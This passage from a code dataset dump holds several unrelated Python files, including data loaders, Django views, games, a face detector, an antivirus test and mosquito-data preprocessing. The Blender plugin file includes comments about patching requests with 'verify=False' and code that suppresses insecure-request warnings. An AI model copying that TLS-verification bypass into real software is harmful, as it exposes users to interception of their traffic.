file_id_match = file_id_pattern.match(zf)\n assert file_id_match is not None, f'Could not find file id in {zf!r}'\n\n file_id = file_id_match['file_id']\n if file_id not in loaded_file_ids:\n loaded_file_ids.add(file_id)\n else:\n print(f'Skipping zipped file {zf} with id {file_id}')\n continue\n\n print(f'Opening zipped file {zf} with id {file_id}')\n with ZipFile(safegraph_multi_zipfile.open(zf)) as safegraph_zipfile:\n\n print(f'Opening gzipped file with name core_poi-patterns.csv.gz')\n with GzipFile(fileobj=safegraph_zipfile.open('core_poi-patterns.csv.gz')) as patterns_csv_file:\n\n print('Reading the ungzipped csv file')\n safegraph_patterns_df = pd.read_csv(patterns_csv_file)\n\n print(f'Writing the file to bigquery as safegraph_patterns_{file_id}')\n try:\n # Since these tables are so large, and because past data\n # shouldn't change, I'm going to not load data that's\n # already present in the dataset. To re-trigger a load,\n # I'll have to delete the existing table.\n safegraph_patterns_df.to_gbq(f'{dataset_name}.safegraph_patterns_{file_id}', if_exists='fail')\n except TableCreationError:\n print('Table seems to already exist. Skipping.')\n continue\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"airflow/dags/data_pipeline/load_safegraph_patterns.py","file_name":"load_safegraph_patterns.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"555672423","text":"from django.shortcuts import render\nfrom .forms import PostCreateForm\nfrom object.models import *\nfrom object.numbers import *\n\n\n# Create your views here.\n\ndef user_profile(request, user_username):\n if request.method == \"GET\":\n return render(request, 'baseapp/user_profile.html')\n\ndef create_new(request):\n if request.method == \"POST\":\n form = PostCreateForm(request.POST)\n if form.is_valid():\n has_title = False\n has_description = False\n has_another_profile = False\n\n if form.cleaned_data['whose'] == 'other':\n has_another_profile = True\n if form.cleaned_data['title'] == 'on':\n has_title = True\n if form.cleaned_data['description'] == 'on':\n has_description = True\n post = Post.objects.create(user=request.user,\n has_title=has_title,\n has_description=has_description,\n has_another_profile=has_another_profile,\n uuid=uuid.uuid4().hex)\n if has_title:\n PostTitle.objects.create(post=post, title=form.cleaned_data['title_content'])\n if has_description:\n PostDescription.objects.create(post=post, description=form.cleaned_data['description_content'])\n if has_another_profile:\n PostProfile.objects.create(post=post, name=form.cleaned_data['name'])\n post_chat = PostChat.objects.create(post=post, before=None, kind=POSTCHAT_START)\n # 여기서 post unique constraint 처리 해주면 좋긴 하나 지금 하기엔 하고 싶지 않다.\n return render(request, 'baseapp/create_new_second.html', {'form': form, 'post': post})\n if request.method == \"GET\":\n form = PostCreateForm\n return render(request, 'baseapp/create_new_first.html', {'form': form})\n\ndef post(request, user_username, uuid):\n if request.method == \"GET\":\n\n return render(request, 'baseapp/post.html', )","sub_path":"baseapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222013988","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## La columna 3 del archivo `data.csv` contiene una fecha en formato \n## `YYYY-MM-DD`. Imprima la cantidad de registros por cada mes separados\n## por comas, tal como se muestra a continuación.\n##\n## Rta/\n## 01,3\n## 02,4\n## 03,2\n## 04,4\n## 05,3\n## 06,3\n## 07,5\n## 08,6\n## 09,3\n## 10,2\n## 11,2\n## 12,3\n##\n## >>> Escriba su codigo a partir de este punto <<<\n\nfile = open('data.csv', 'r').readlines()\nfile = [row[0:-1] for row in file]\nfile = [row.split('\\t') for row in file]\ndata = file\n\nresult = {}\n\nfor element in data:\n\tresult[(element[2].split('-')[1])] = 0\n\nfor element in data:\n\tresult[(element[2].split('-')[1])] = result[(element[2].split('-')[1])] + 1\n\nfor key in sorted(result.keys()): \n print(key + ',' + str(result[key]))\n\n","sub_path":"03-python=1/q04=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41752428","text":"# MIT License\n\n# Copyright (c) 2017 GiveMeAllYourCats\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the 'Software'), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n# Code author: GiveMeAllYourCats\n# Repo: https://github.com/michaeldegroot/cats-blender-plugin\n# Edits by: GiveMeAllYourCats, Hotox\n\nbl_info = {\n 'name': 'Cats Blender Plugin',\n 'category': '3D View',\n 'author': 'GiveMeAllYourCats',\n 'location': 'View 3D > Tool Shelf > CATS',\n 'description': 'A tool designed to shorten steps needed to import and optimize models into VRChat',\n 'version': (0, 12, 1), # Has to be (x, x, x) not [x, x, x]!! # Only change this version and the dev branch var right before publishing the new update!\n 'blender': (2, 80, 0),\n 'wiki_url': 'https://github.com/michaeldegroot/cats-blender-plugin',\n 'tracker_url': 'https://github.com/michaeldegroot/cats-blender-plugin/issues',\n 'warning': '',\n}\n\nimport os\nimport sys\n\n# Append files to sys path\nfile_dir = os.path.dirname(__file__)\nif file_dir not in sys.path:\n sys.path.append(file_dir)\n\nimport copy\nimport globs\nimport requests\nimport extend_types\n\n# Load package name, important for updater\nglobs.package = __package__\n\n# Check if cats is reloading or started fresh\nif \"bpy\" not in locals():\n import bpy\n globs.is_reloading = False\nelse:\n globs.is_reloading = True\n\nif not globs.is_reloading:\n import mmd_tools_local\n import addon_updater_ops\n\n # This order is important\n import tools\n import ui\nelse:\n import importlib\n importlib.reload(mmd_tools_local)\n importlib.reload(addon_updater_ops)\n importlib.reload(tools)\n importlib.reload(ui)\n\n\n# How to update mmd_tools:\n# Paste mmd_tools folder into project\n# Delete mmd_tools_local folder\n# Refactor folder name \"mmd_tools\" to \"mmd_tools_local\"\n# Search for \"show_backface_culling\" and set it to False in view.py\n# Done\n\n# How to update googletrans:\n# in the gtoken.py on line 57 update this line to include \"verify=False\":\n# r = self.session.get(self.host, verify=False)\n# In client.py on line 42 remove the Hyper part, it's not faster at all!\n# Just comment it out.\n# Also see pull request for TKK change\n# Also wm progress in client.py\n# Done\n\n# How to set up PyCharm with Blender:\n# https://b3d.interplanety.org/en/using-external-ide-pycharm-for-writing-blender-scripts/\n\nglobs.dev_branch = False\nglobs.version = copy.deepcopy(bl_info.get('version'))\n\n\ndef register():\n print(\"\\n### Loading CATS...\")\n\n # Load settings\n tools.settings.load_settings()\n\n # if not tools.settings.use_custom_mmd_tools():\n # bpy.utils.unregister_module(\"mmd_tools\")\n\n # Load mmd_tools\n try:\n mmd_tools_local.register()\n except AttributeError:\n print('Could not register local mmd_tools')\n pass\n\n # Register updater\n try:\n addon_updater_ops.register(bl_info)\n except ValueError as e:\n print('\\n!!! Error while registering Updater:\\n' + str(e) + '\\n')\n pass\n\n # Register all classes\n count = 0\n tools.register.order_classes()\n for cls in tools.register.__bl_ordered_classes:\n # print(cls)\n bpy.utils.register_class(cls)\n count += 1\n print('Registered', count, 'CATS classes.')\n\n # Register Scene types\n extend_types.register()\n\n # Set cats version string\n tools.common.set_cats_verion_string()\n\n # Load supporter and settings icons and buttons\n tools.supporter.load_other_icons()\n tools.supporter.load_supporters()\n tools.supporter.register_dynamic_buttons()\n\n # Load the dictionaries and check if they are found\n globs.dict_found = tools.translate.load_translations()\n\n # Set preferred Blender options\n bpy.context.user_preferences.system.use_international_fonts = True\n bpy.context.user_preferences.filepaths.use_file_compression = True\n\n # Add shapekey button to shapekey menu\n bpy.types.MESH_MT_shape_key_specials.append(tools.shapekey.addToShapekeyMenu)\n\n # Disable request warning when using google translate\n requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n # Apply the settings after a short time, because you can't change checkboxes during register process\n tools.settings.start_apply_settings_timer()\n\n print(\"### Loaded CATS successfully!\")\n\n\ndef unregister():\n print(\"### Unloading CATS...\")\n # # Unload mmd_tools\n try:\n mmd_tools_local.unregister()\n except AttributeError:\n print('Could not unregister local mmd_tools')\n pass\n\n # Unload all classes in reverse order\n count = 0\n for cls in reversed(tools.register.__bl_ordered_classes):\n bpy.utils.unregister_class(cls)\n count += 1\n print('Unregistered', count, 'CATS classes.')\n\n # Unload the updater\n addon_updater_ops.unregister()\n\n # Unregister all dynamic buttons and icons\n tools.supporter.unregister_dynamic_buttons()\n tools.supporter.unload_icons()\n\n # Remove shapekey button from shapekey menu\n bpy.types.MESH_MT_shape_key_specials.remove(tools.shapekey.addToShapekeyMenu)\n\n print(\"### Unloaded CATS successfully!\")\n\n\nif __name__ == '__main__':\n register()\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359794911","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty\nfrom kivy.logger import Logger\n\n\nclass MoneyInput(BoxLayout): # \n\tvalue = StringProperty(\"0.00 €\") \t#formated number string\n\traw_value = \"\" \t\t\t\t\t\t#number string\n\t\n\t#add a number to the raw string\n\tdef addNumber(self, number):\n\t\tvorKomma = self.raw_value[:-2]\n\t\t\n\t\tif (number == '0') and (len(self.raw_value) == 0):\n\t\t\treturn \n\t\ttry:\n\t\t\ttest = int(number)\n\t\t\tself.raw_value = self.raw_value + number\n\t\t\tself.updateValue()\n\t\texcept:\t\t\t\n\t\t\tLogger.warning(\"Input: only numbers from 0-9 are allowed\")\n\t\n\t#delete the last number enterd in raw string\n\tdef delNumber(self):\n\t\tself.raw_value = self.raw_value[:-1]\n\t\tself.updateValue()\n\n\t#update the formated string \n\tdef updateValue(self):\n\t\tvorKomma = self.raw_value[:-2]\n\t\tif vorKomma == '':\n\t\t\tvorKomma = '0'\n\t\tnachKomma = self.raw_value[-2:]\n\t\tif len(nachKomma) == 0:\n\t\t\tnachKomma = \"00\"\n\t\tif len(nachKomma) == 1:\n\t\t\tnachKomma = '0' + nachKomma\n\t\tself.value = vorKomma + '.' + nachKomma + \" €\" \n","sub_path":"src/input_manager.py","file_name":"input_manager.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"536672154","text":"\"\"\"\nRacket - module for working with a racket\n\"\"\"\nimport pygame\nimport colors\n\nsize = (50, 100) # 50x100 pixels\nposition = (0, 0) # position of the racket\nvelocity = 0\n\n\ndef setup(screen):\n \"Setups the initial position of the racket\"\n global position\n\n (_, height) = screen.get_size()\n (racket_x, _) = position\n\n # calculate new y position for the racket\n new_y = height / 2 - size[1]\n\n position = (racket_x, new_y)\n\n\ndef draw(screen):\n \"Draws racket on the screen\"\n global position\n global size\n\n (left, top) = position\n (width, height) = size\n rect = pygame.Rect(left, top, width, height)\n\n pygame.draw.rect(screen, colors.WHITE, rect)\n\n\ndef on(event):\n \"Update racket on event\"\n global velocity\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_DOWN:\n velocity = 5\n elif event.key == pygame.K_UP:\n velocity = -5\n elif event.type == pygame.KEYUP:\n velocity = 0\n\n\ndef update(width, height):\n \"update the position of the racket\"\n global velocity\n global position\n global size\n\n (x, y) = position\n (_, racket_height) = size\n\n new_y = y + velocity\n\n if new_y < 0:\n new_y = 0\n elif new_y + racket_height > height:\n new_y = height - racket_height\n\n position = (x, new_y)\n","sub_path":"day4/pong/racket.py","file_name":"racket.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"228046098","text":"class Solution:\n def longestMountain(self, A: List[int]) -> int:\n result = base = 0\n while base < len(A):\n end = base\n if end + 1 < len(A) and A[end] < A[end + 1]:\n while end + 1 < len(A) and A[end] < A[end + 1]:\n end += 1\n if end + 1 < len(A) and A[end] > A[end + 1]:\n while end + 1 < len(A) and A[end] > A[end + 1]:\n end += 1\n result = max(result, end - base + 1)\n base = max(end, base + 1)\n return result","sub_path":"LeetCode/November Leetcoding Challenge/Longest Mountain in Array.py","file_name":"Longest Mountain in Array.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549619631","text":"import cv2\n\nface_cascade = cv2.CascadeClassifier('./classifiers/haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('./classifiers/haarcascade_eye.xml')\ncam = cv2.VideoCapture('tcp://192.168.1.1:5555')\n# cam = cv2.VideoCapture(0)\nrunning = True\nwhile running:\n # get current frame of video\n running, img = cam.read()\n if running:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex,ey,ew,eh) in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv2.imshow('frame', img)\n if cv2.waitKey(1) & 0xFF == 27:\n running = False\n else:\n # error reading frame\n print ('error reading video feed')\n\n\n\ncam.release()\ncv2.destroyAllWindows()\n\n\n\ndef detectObject(frame):\n\n\n\n pass\n","sub_path":"cv-server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62125945","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: 1903\n# TestcaseDescription:Primary clean and secondary delete actions for OAS on an eicar file.\n\nimport sys\nimport logging\nimport time\nimport subprocess\n# Add common folder into the sys path for module importing\nsys.path.append(\"../../Common\")\nimport commonFns\nsys.path.append(\"../\")\nimport commonAntiMalwareFns\nimport commonOASFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\n\ntestcaseName = sys.argv[0][:-3]\nclass TestCase(BaseTest):\n\n def __init__(self):\n logging.info(\"TestcaseID : 1903\")\n logging.info(\" Primary clean and secondary delete actions for OAS on an eicar file.\")\n self._filename = '/tmp/lsh-1903-eicar-test.txt'\n if len(sys.argv) > 2 and sys.argv[2] :\n self._filename = sys.argv[2] + '/lsh-1903-eicar-test.txt'\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n\n if not commonOASFns.setOASPrimaryAction('Clean'):\n logging.error(\"Unable to set OAS Primary Action\")\n return 1\n logging.info(\"Successfully set OAS Primary Action.\")\n \n if not commonOASFns.setOASSecondaryAction('Delete') : \n logging.error(\"Unable to set OAS Secondary Action\")\n return 1\n logging.info(\"Successfully set OAS Secondary Action.\")\n \n \n if not commonAntiMalwareFns.createEicarInfection(self._filename) :\n logging.error(\"Unable to create infected file.\")\n return 1\n logging.info(\"Successfully created infected file.\")\n\n return 0\n\n\n def verify(self):\n logging.info(\"Verifying testcase %s\" % testcaseName)\n time.sleep(5)\n if os.path.exists(self._filename):\n logging.error(\"File %s exist which should have got deleted!\" % self._filename)\n return 1\n logging.debug(\"Checking if file is quarantined\")\n if commonAntiMalwareFns.isFileQuarantined(self._filename) :\n logging.error(\"File is quarantined\")\n return 1\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n foundCrash = foundCrash + self._cleanup()\n commonFns.cleanLogs()\n \n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n \n return foundCrash\n \n def _cleanup(self) :\n _retval = 0\n if not commonAntiMalwareFns.resetToDefaults() :\n logging.error(\"Failed to reset to defaults\")\n _retval = 1\n if os.path.exists(self._filename) :\n os.remove(self._filename)\n return _retval\n\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds...\n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n\n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Antimalware/OAS/OAS_BVT_2.py","file_name":"OAS_BVT_2.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"25338306","text":"import pyglet\nfrom pyglet import clock\n\nfrom ScreenManager import ScreenManager\nfrom StateManager import StateManager\nfrom SpriteManager import SpriteManager\n\nfrom Game import Game\n\n\nclass GameController(pyglet.window.Window):\n\t\"\"\"docstring for GameController\"\"\"\n\tdef __init__(self):\n\t\t# create main game window\n\t\tsuper(GameController, self).__init__(1280, 720, \"Panda Runner\")\n\n\t\t# setup various managers\n\t\tself.screenManager = ScreenManager(self)\n\t\tself.stateManager = StateManager(self)\n\t\tself.spriteManager = SpriteManager()\n\n\t\t# load spritesheet and probably sounds in the future\n\t\tself.loadResources()\n\t\tself.start()\n\n\tdef start(self):\n\t\t# schedule update function to be called every frame\n\t\t# I need to add some sort of FPS setting here\n\t\tclock.schedule(self.update)\n\n\t\t# instantiate the main game instance\n\t\t# this will be changed to the menu instance when it's implemented\n\t\tgameState = Game(self)\n\t\tself.stateManager.addState('game', gameState)\n\t\tself.stateManager.setState('game')\n\n\t# prepare various resources such as sprite sheets and sounds\n\tdef loadResources(self):\n\t\tself.spriteManager.newSheet('main', 'sprites.png')\n\n\t# Main update function\n\tdef update(self, dt):\n\t\tself.screenManager.update(dt)\n\t\tself.draw()\n\n\t#main draw function\n\tdef draw(self):\n\t\tself.screenManager.draw()","sub_path":"GameController.py","file_name":"GameController.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504699635","text":"import sys\nimport traceback \nclass addition():\n def __init__(self, new_x, new_y):\n self.x = new_x\n self.y = new_y \n pass\n\n def __add__(self,add):\n if not isinstance(add, addition) :\n traceback.print_stack()\n sys.exit(\"Error: is not addditon class. Addition Impossible \")\n return addition(self.x + add.x,\n self.y + add.y )\n #def __mul__(self):\n #def __sub__(self):\n #def __mul__(self):\n #def __floodiv__(self):\n #def __truediv__(self):\n\n def __str__(self):\n return \"({}, {})\".format(self.x, self.y)\n\nif __name__ == \"__main__\" :\n a = addition(2,2)\n b = addition(4,4)\n print(a)\n print(b)\n a += b\n print(a)\n a += 1 # Erreur\n","sub_path":"Langage/Python/Class/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522190199","text":"import shapefile\nfrom scipy.spatial import cKDTree\nimport numpy as np\nimport pandas as pd\nfrom os import listdir\nfrom os.path import isfile, join\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.linear_model import LinearRegression\n\n############\n# Preprocessing pipeline. In lieu of SKLearn pipeline, as a result of needing\n# to do aggregation by rows. However, it is modeled on a pipeline such that\n# both the train and test data are passed in once and processed data is returned\n############\n\n#####\n# first step only impacts the training data. It aggregates observations that have\n# the same species/date/trapLocation.\n# The aggregation is of number of mosquitos and if westNile was observered\n#####\n\ndef agg_on_species(train, test):\n\n #Aggregate only mosquitos and westNile\n noAgg = [c for c in train.columns if c not in ['NumMosquitos','WnvPresent']]\n agg = train.groupby(noAgg)['NumMosquitos', 'WnvPresent'].sum()\n\n # Bring features back out from multi-index\n for i, c in enumerate(noAgg):\n agg[c] = agg.index.map(lambda x:x[i])\n agg.index = range(0,len(agg))\n\n # Change WNV back to binary\n agg['WnvPresent'] = (agg['WnvPresent'].map(lambda x:x>0)).astype(int)\n\n return agg, test\n\n#####\n# Initial preprocessing Adds a location feature which will be used for merging\n# changes the date column from a string to a datetime object,,\n# drops address columns which will not be used\n# Creates dummy variables for each obseved species.\n#####\n\ndef InitPrepross(train, test):\n\n # Adding a location tuple\n def location_add(df):\n df['Location'] = [(df.loc[idx,'Longitude'], df.loc[idx, 'Latitude'])\n for idx in df.index]\n return df\n\n # Changing data type of date\n def change_date(df):\n df['Date'] = pd.to_datetime(df['Date'])\n\n return df\n\n # Dropping address features\n def drop_unused(df):\n for col in ['Address','Block','Street',\n 'AddressNumberAndStreet', 'AddressAccuracy',\n ]:\n try:\n df = df.drop(col, axis = 'columns')\n except:\n print(col, 'not present')\n\n return df\n\n # Adding Species Dummy Vars\n def species_dummies(df):\n species = ['CULEX PIPIENS', 'CULEX PIPIENS/RESTUANS',\n 'CULEX RESTUANS', 'CULEX SALINARIUS',\n 'CULEX TERRITANS', 'CULEX TARSALIS',\n 'CULEX ERRATICUS']\n for s in species:\n df[s] = (df['Species'] == s).astype(int)\n\n return df\n\n # Wrapper function which combines all steps\n def transform(df):\n df = drop_unused(df)\n df = location_add(df)\n df = change_date(df)\n df = species_dummies(df)\n return df\n\n return transform(train), transform(test)\n\n#####\n# Location processing finds each unique location, and Then\n# calculates the distance from that location to each park and water\n# feature in Chicago\n#####\n\ndef LocationProcess(train, test):\n parkDir = './AddData/Parks/'\n waterDir = './AddData/Water/'\n\n # Taking in the water shape files, and building a cKDTree\n # which returns the the nearest point to an entered point,\n # and gives the distance\n def buildWaterFinder():\n water = [f for f in listdir(waterDir)\n if isfile(join(waterDir,f))\n if f.count('.csv') ==0]\n\n waterShape = waterDir + water[0].split('.')[0]\n waterSR = shapefile.Reader(waterShape).shapeRecords()\n\n waterFinder = {}\n for i, s in enumerate(waterSR):\n waterFinder[i] = cKDTree(s.shape.points)\n\n return waterFinder\n\n # Taking in park shape files, building cKDTree\n # Also builds dictionaries for the size of each park\n def buildParkDicts():\n parks = [f for f in listdir(parkDir)\n if isfile(join(parkDir,f))\n if f.count('.csv') ==0]\n parkShape = parkDir + parks[0].split('.')[0]\n parkSR = shapefile.Reader(parkShape).shapeRecords()\n\n parkFinder = {}\n parkSize = {}\n for s in parkSR:\n parkSize[s.record[4]] = s.record[19]\n parkFinder[s.record[4]] = cKDTree(s.shape.points)\n\n return parkFinder, parkSize\n\n # Given a location, and one of the finder dictinaries,\n # return distance to nearest location in finder\n # and if size dictionary is present, add in size location\n # Also returns an inverse square-law feature of:\n # park size / distance to park ^2\n def calculate_distances(loc, finder, size = None):\n Dist = {}\n for k in finder:\n Dist[k] = finder[k].query(loc, 1)[0]\n\n if size:\n toRet = {}\n for k in Dist:\n Dist[k] = (Dist[k], size[k], size[k]/(Dist[k]**2))\n return Dist\n\n # From the dictionary returned by distance finder, create useable DataFrame\n # mostly deals with re-indexeing, and re-naming\n def dfFromDict(dct):\n toRet = pd.DataFrame(dct)\n toRet = toRet.transpose()\n toRet.index = [idx for idx in toRet.index]\n\n if type(toRet.iloc[0,0]) == tuple:\n for c in toRet:\n toRet['P ' + str(c) + ' A'] = [e[1] for e in toRet[c]]\n toRet['P ' + str(c) + ' E'] = [e[2] for e in toRet[c]]\n toRet['P ' + str(c)] = [e[0] for e in toRet[c]]\n toRet = toRet.drop(c, axis = 'columns')\n else:\n toRet.columns = ['W ' + str(c) for c in toRet.columns]\n\n return toRet\n\n # wrapper function which searches through unique Locations\n # and finds distances to features\n def info(df, finder, size = None):\n uniqueLocs = df['Location'].unique()\n rows = {}\n for loc in uniqueLocs:\n rows[loc] = calculate_distances(loc, finder, size)\n\n return dfFromDict(rows)\n\n # creates dataframe that will be passed into svd\n def transform(df):\n toRet = pd.concat( [info(df, waterFinder),\n info(df, parkFinder, parkSize)],\n axis = 'columns')\n\n return toRet\n\n parkFinder, parkSize = buildParkDicts()\n waterFinder = buildWaterFinder()\n\n # Returns DFs: index = locations\n return transform(train), transform(test)\n\n#####\n# SVD for park/ Water data\n# gets trained on \"train data\"\n# but fits both training and testing data\n#####\n\ndef SVD(train, test):\n\n # Find columns that are marked with a certain letter\n def find_cols(df, tpe):\n mask = [c for c in df.columns if c[0] == tpe ]\n\n return df.loc[:,mask]\n\n # Provide a fitted Truncated SVD\n def yeildFitTSVD(df):\n comps = 4\n\n TSVD = TruncatedSVD(n_components = comps)\n TSVD.fit(df)\n\n return TSVD\n\n # Transform, given an SVD\n def transformTSVD(df, TSVD,tpe):\n toRet = TSVD.transform(df)\n toRet = pd.DataFrame(toRet, index = df.index)\n toRet.columns = [tpe + str(c) for c in toRet.columns]\n\n return toRet\n\n # Code to fit, then transform for Water, then park SVDs,\n # given already calculated data from above function.\n # Will then be passed to merge, by location, on to main data\n\n toRetTrain = []\n toRetTest = []\n for t in ['W', 'P']:\n sTrain = find_cols(train, t)\n sTest = find_cols(test,t)\n sTSVD = yeildFitTSVD(sTrain)\n\n toRetTrain.append(transformTSVD(sTrain, sTSVD, t))\n toRetTest.append(transformTSVD(sTest, sTSVD, t))\n\n toRetTrain = pd.concat(toRetTrain, axis = 'columns')\n toRetTest = pd.concat(toRetTest, axis = 'columns')\n\n return toRetTrain, toRetTest\n\n#####\n# Weather processing takes in weather data, aggregates for week previous to\n# observations.\n# Thus weather is aggregated for each Daterange, for each location\ndef WeatherProcess(train, test):\n\n # Preprocessing weather information, dropping columns,\n # recasting data types\n def yeildWeather(target):\n weather = pd.read_csv(target)\n weather['Date'] = pd.to_datetime(weather['Date'])\n\n toDrop = ['Depart', 'Depth','Water1',\n 'SnowFall', 'CodeSum', 'Heat',\n 'Cool', 'Sunrise']\n weather = weather.drop(toDrop, axis=1)\n\n toReplace = {'M':np.nan, ' T': 0.001, '-': '0000'}\n for k in toReplace:\n weather = weather.replace(k, toReplace[k])\n\n\n toFloats = ['Tavg', 'WetBulb', 'PrecipTotal','StnPressure',\n 'SeaLevel', 'ResultSpeed','AvgSpeed']\n for c in toFloats:\n weather[c] = weather[c].astype(float)\n\n # Some errors found in sunset have, e.g. 7:00 pm as '1860'\n weather['Sunset'] = [date\n if date[-2:] != '60'\n else str(int(date[0:2])+1)+'00'\n for date in weather['Sunset']]\n\n weather['Sunset'] = pd.to_datetime(weather['Sunset'],\n format=\"%H%M\")\n weather.dropna(inplace=True)\n\n return weather[weather['Station']== 1]\n\n # Create a function that will model average temperature per week\n # Take weekly temperature averages, then model a quadradic linear model\n # then create dictionary that includes predictions for that model\n def yeildAvgTemp(weather):\n weather['Wk'] = weather['Date'].dt.week\n weekTemp = pd.DataFrame(\n weather.groupby('Wk')['Tavg'].mean())\n weekTemp['Week'] = weekTemp.index - 17\n weekTemp['Week^2'] = weekTemp['Week']**2\n\n lr = LinearRegression().fit(weekTemp.drop('Tavg', axis = 'columns'),\n weekTemp['Tavg'])\n toRet = {}\n for w in range(1,53):\n toRet[w] = lr.intercept_ + (lr.coef_[0]*(w-17)) + (lr.coef_[1] * ((w-17)**2))\n\n return toRet\n\n # Given a subset of the weather dataframe, calculate averages, maxes, mins\n # etc.\n # Will be merged upon final date of weather subset\n def calculate_agregate( weather_sub, avgTDict):\n toRet = pd.Series()\n\n allAgg = [np.max, np.min, np.mean]\n toAgg = {'DewPoint': allAgg,\n 'StnPressure': allAgg,\n 'AvgSpeed': allAgg,\n 'Tmax':[np.max],\n 'Tmin':[np.min],\n 'Tavg':[np.mean],\n 'PrecipTotal':[np.sum, np.mean]\n }\n for k in toAgg:\n for f in toAgg[k]:\n toRet.loc[k + str(f).split(' ')[1]] = f(weather_sub[k])\n\n finalEntry = weather_sub.iloc[len(weather_sub)-1]\n\n toRet['temp_expected'] = avgTDict[pd.to_datetime(finalEntry['Date']).week]\n toRet['temp_diff'] = toRet['Tavgmean'] - toRet['temp_expected']\n\n sunset = finalEntry['Sunset']\n toRet['sunset'] = sunset.hour + (sunset.minute / 60)\n\n return toRet\n\n # Given a set of dates, create date ranges to subset weather.\n # Date ranges are either the time between trap observations, or, one week prior\n # to the first observation in a year\n def date_ranges(dates):\n uniqueYears = set([pd.to_datetime(d).year for d in dates])\n\n dates = sorted(dates)\n fyear = []\n for y in uniqueYears:\n for d in dates:\n if pd.to_datetime(d).year == y:\n fyear.append(d)\n break\n\n for d in fyear:\n dates = np.insert(dates, 0, d - pd.Timedelta(days = 8))\n\n dates = sorted(dates)\n\n dateRanges = []\n for i in range(len(dates)-1):\n if pd.to_datetime(dates[i]).year == 